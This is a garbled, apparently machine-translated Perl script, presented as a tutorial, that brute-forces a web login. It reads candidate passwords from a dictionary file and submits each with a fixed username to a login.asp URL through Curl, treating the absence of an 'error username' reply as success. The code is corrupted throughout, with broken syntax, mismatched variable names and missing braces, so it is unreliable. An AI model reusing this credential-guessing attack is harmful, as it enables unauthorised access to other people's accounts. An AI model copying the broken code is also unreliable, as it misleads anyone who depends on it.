Perl to create a snowfire

xiaoxiao2021-03-06  71

Use core :: easy;

$ OK = 1;

$ usrname = "shitusername";

# 欲 用户 用户 名

Open (DICT, "Password.txt");

# 字 字

While ($ PasswdTemp = and $ ok! = 0) {

# IF ($ passwdtemp = ) {

# Die "no password remain";

# $ passwdtemp = ;

Chomp ($ PasswdTemp);

Print "CRACKING Password IS $ PasswdTemp / N";

IF (Classme_crack_Check ($ UserName, $ PasswdTemp) == 0) {

Print "Finish / NPassword IS / N $ PasswdTemp";

$ OK = 0;


Else {

$ OK = 1;

# $ ok ;

#print $ ok. "/ n";




IF ($ OK! = 0) {

DIE "No Password Left!";

} else {

Print "/ ncongruatulation / n";


SUB Classme_crack_check {

MY ($ UserName, $ Password) = @ _;

My $ URL = " NEW / login.asp? username = $ usrname & password = $ password & comtype = default ";

# This place temporarily hidden, see how to fill in it

MY $ curl = curl :: Easy-> new ();

$ CURL-> Setopt (CURLOPT_URL, $ URL);

#my $ ketcode = $ curl-> perform ();

Print $ RETCODE;

SUB body_callback {

MY ($ Chunk, $ context) = @ _;

Push @ {$ context}, $ chunk;

Return Length ($ chunk); # ok


$ curl-> setopt (curlopt_writefunction, / & body_callback);

MY @Body;

$ CURL-> setopt (curlopt_file, / @ body);

MY $ RETCODE = $ CURL-> Perform ();

IF ($ RETCODE! = 0) {

Return 1;

} else {

Return 0;


#print $ body;

#print Join ("", @ body);

#print "/ n / N";

$ TEMP = $ BODY [1];

($ E, @ body) = @ body;

#print "begin / n";

#print $ e;

# 中 中 值 值

Print "/ n / n / n"; if ($ E = ~ / error username /) {

Return 1;

} else {

Return 0;




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